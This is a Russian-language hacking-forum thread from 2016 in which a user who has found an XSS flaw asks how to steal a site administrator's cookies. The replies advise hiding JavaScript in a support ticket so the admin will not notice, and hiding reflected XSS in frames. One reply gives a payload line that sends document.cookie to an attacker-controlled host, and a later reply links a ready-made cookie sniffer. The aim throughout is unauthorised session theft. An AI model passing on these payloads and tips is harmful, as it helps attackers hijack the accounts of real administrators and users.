PDA

Просмотр полной версии : как достать куки админа ? (xss)


ClayFox
27.04.2016, 20:54
http://i.imgur.com/t0LI7cE.png

​всем привет, я хочу изучать xss, читал статьи в форуме, но так и не нашел ответ моего вопроса... Так, я нашел xss в сайте, но дальше не знаю как достать куки админа и так далее... если можно скиньте ссылку на видео или хорошую статью про xss.

заранее спасибо

st55
27.04.2016, 21:16
Ну, если XSS активная, то нужно встроить (например) как изображение и впарить страницу с JS кодом админу, потом получить куки. (К примеру тикеты. Отправляешь тикет с каким-то нейтральным текстом и встраиваешь туда JS код. Не догадаются, проверенно).

Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом, а он может понять и не перейти. Такие дела. Эксплуатация XSS вообще штука простая.

ClayFox
27.04.2016, 21:27
↑ (https://antichat.live/posts/3978498/)
Ну, если XSS активная, то нужно встроить (например) как изображение и впарить страницу с JS кодом админу, потом получить куки. (К примеру тикеты. Отправляешь тикет с каким-то нейтральным текстом и встраиваешь туда JS код. Не догадаются, проверенно).
Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом, а он может понять и не перейти. Такие дела. Эксплуатация XSS вообще штука простая.


a как понять XSS активная или пассивная ?

faza02
27.04.2016, 21:39
↑ (https://antichat.live/posts/3978498/)
Ну, если XSS активная, то нужно встроить (например) как изображение и впарить страницу с JS кодом админу, потом получить куки. (К примеру тикеты. Отправляешь тикет с каким-то нейтральным текстом и встраиваешь туда JS код. Не догадаются, проверенно).
Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом, а он может понять и не перейти. Такие дела. Эксплуатация XSS вообще штука простая.


активные и пассивные? ты уверен?

t0ma5
27.04.2016, 21:45
↑ (https://antichat.live/posts/3978509/)
активные и пассивные? ты уверен?


наверно он не про xss

на 9 из 10 постов про xss хочется кидать линк, хотя бы на вики

https://ru.wikipedia.org/wiki/Межсайтовый_скриптинг (https://ru.wikipedia.org/wiki/%D0%9C%D0%B5%D0%B6%D1%81%D0%B0%D0%B9%D1%82%D0%BE%D 0%B2%D1%8B%D0%B9_%D1%81%D0%BA%D1%80%D0%B8%D0%BF%D1 %82%D0%B8%D0%BD%D0%B3)

может прочтут

"если можно скиньте ссылку на видео или хорошую статью про xss."

блитц вроде что то такое говорил, "машину купил, права купил, ездить не купил"

то есть в интернетах вы не нашли ни одного описания, ни одного примера использования xss? пздц

Zen1T21
27.04.2016, 23:59
Если в GET:

document.location=('http://ip/xss.php? (http://ip/xss.php)' + document.cookie);

Если в POST:

забить

faza02
28.04.2016, 02:08
↑ (https://antichat.live/posts/3978546/)
Если в GET:
document.location=('
http://ip/xss.php? (http://ip/xss.php)
' + document.cookie);
Если в POST:
забить


да ну? иногда лучше жевать

M_script
28.04.2016, 06:14
↑ (https://antichat.live/posts/3978498/)
Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом


Никто так не делает. Пассивки во фреймах прячутся.


↑ (https://antichat.live/posts/3978509/)
активные и пассивные? ты уверен?


Не надо новичков путать. Пусть сначала поймут суть, а потом уже с классификацией разбираются.

Ачат появился раньше, чем классификация сторед/рефлектед/ДОМ стала общепринятой. Во всех статьи у нас XSS делятся именно на активки/пассивки.

powerOfthemind
28.04.2016, 12:13
Кто-то может поделиться снифером для xss или код скинуть? Буду благодарен

Zen1T21
28.04.2016, 23:32
↑ (https://antichat.live/posts/3978575/)
да ну? иногда лучше жевать


Как там на жердочке?)

nick_sale
01.05.2016, 09:39
↑ (https://antichat.live/posts/3978677/)
Кто-то может поделиться снифером для xss или код скинуть? Буду благодарен


Держи http://kanick.ru/sniffer/ . Когда-то им пользовался. Не знаю,как сейчас,но раньше работал на ура,скорее всего и сейчас тоже)